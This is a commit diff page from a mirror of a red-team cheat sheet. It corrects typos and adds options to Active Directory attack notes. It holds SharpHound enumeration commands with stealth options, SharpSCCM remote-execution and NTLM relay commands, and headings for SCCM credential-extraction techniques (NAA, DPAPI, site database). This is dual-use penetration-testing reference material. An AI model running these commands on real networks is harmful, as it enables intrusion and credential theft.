swisskyrepo
/
InternalAllTheThings
mirror of https://github.com/swisskyrepo/InternalAllTheThings.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

SCCM typos + SharpHound new args

pull/6/head
Swissky 2024-03-22 12:41:22 +01:00
parent 1cee3b6738
commit 581fdf4f18
2 changed files with 10 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
docs/active-directory/ad-adds-enumerate.md
View File

@ -23,7 +23,8 @@ Use the correct collector:
.\SharpHound.exe -c all --LdapUsername <UserName> --LdapPassword <Password> --JSONFolder <PathToFile> .\SharpHound.exe -c all --LdapUsername <UserName> --LdapPassword <Password> --JSONFolder <PathToFile>
.\SharpHound.exe -c all --LdapUsername <UserName> --LdapPassword <Password> --domaincontroller 10.10.10.100 -d active.htb .\SharpHound.exe -c all --LdapUsername <UserName> --LdapPassword <Password> --domaincontroller 10.10.10.100 -d active.htb
.\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23
.\SharpHound.exe -c All,GPOLocalGroup --outputdirectory C:\Windows\Temp --prettyprint --randomfilenames --collectallproperties --throttle 10000 --jitter 23 --outputprefix internalallthething
``` ```
* Use [BloodHoundAD/SharpHound.ps1](https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1) - run the collector on the machine using Powershell * Use [BloodHoundAD/SharpHound.ps1](https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1) - run the collector on the machine using Powershell
```powershell ```powershell

16
docs/active-directory/deployment-sccm.md
View File

@ -10,7 +10,7 @@
* Using **SharpSCCM** * Using **SharpSCCM**
```ps1 ```ps1
.\SharpSCCM.exe get device --server <SERVER8NAME> --site-code <SITE_CODE> .\SharpSCCM.exe get devices --server <SERVER8NAME> --site-code <SITE_CODE>
.\SharpSCCM.exe <server> <sitecode> exec -d <device_name> -r <relay_server_ip> .\SharpSCCM.exe <server> <sitecode> exec -d <device_name> -r <relay_server_ip>
.\SharpSCCM.exe exec -d WS01 -p "C:\Windows\System32\ping 10.10.10.10" -s --debug .\SharpSCCM.exe exec -d WS01 -p "C:\Windows\System32\ping 10.10.10.10" -s --debug
``` ```
@ -81,13 +81,13 @@
* [Misconfiguration-Manager - CRED-1](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-1/cred-1_description.md) * [Misconfiguration-Manager - CRED-1](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-1/cred-1_description.md)
Requirements: **Requirements**:
* On the SCCM Distribution Point: `HKLM\Software\Microsoft\SMS\DP\PxeInstalled` = 1 * On the SCCM Distribution Point: `HKLM\Software\Microsoft\SMS\DP\PxeInstalled` = 1
* On the SCCM Distribution Point: `HKLM\Software\Microsoft\SMS\DP\IsPxe` = 1 * On the SCCM Distribution Point: `HKLM\Software\Microsoft\SMS\DP\IsPxe` = 1
* PXE-enabled distribution point * PXE-enabled distribution point
Exploitation: **Exploitation**:
* [csandker/pxethiefy](https://github.com/csandker/pxethiefy) * [csandker/pxethiefy](https://github.com/csandker/pxethiefy)
```ps1 ```ps1
@ -101,12 +101,12 @@ Exploitation:
* [Misconfiguration-Manager - CRED-2](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-2/cred-2_description.md) * [Misconfiguration-Manager - CRED-2](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-2/cred-2_description.md)
Requirements: **Requirements**:
* PKI certificates are not required for client authentication * PKI certificates are not required for client authentication
* Domain accounts credential * Domain accounts credential
Exploitation: **Exploitation**:
Create a machine or compromise an existing one, then request policies such as `NAAConfig` Create a machine or compromise an existing one, then request policies such as `NAAConfig`
@ -116,7 +116,7 @@ SharpSCCM get naa
``` ```
### CRED-3 Extract currently deployed credentials stored as DPAPI blobs and decrypt ### CRED-3 Extract currently deployed credentials stored as DPAPI blobs
> Dump currently deployed secrets via WMI. If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials. > Dump currently deployed secrets via WMI. If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials.
@ -158,7 +158,7 @@ From a remote machine.
``` ```
### CRED-4 Extract legacy credentials stored as DPAPI blobs and decrypt ### CRED-4 Extract legacy credentials stored as DPAPI blobs
* [Misconfiguration-Manager - CRED-4](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-4/cred-4_description.md) * [Misconfiguration-Manager - CRED-4](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-4/cred-4_description.md)
@ -187,7 +187,7 @@ From a remote machine.
### CRED-5 Extract and decrypt the SC_UserAccount table from the site database ### CRED-5 Extract the SC_UserAccount table from the site database
* [Misconfiguration-Manager - CRED-5](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-5/cred-5_description.md) * [Misconfiguration-Manager - CRED-5](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-5/cred-5_description.md)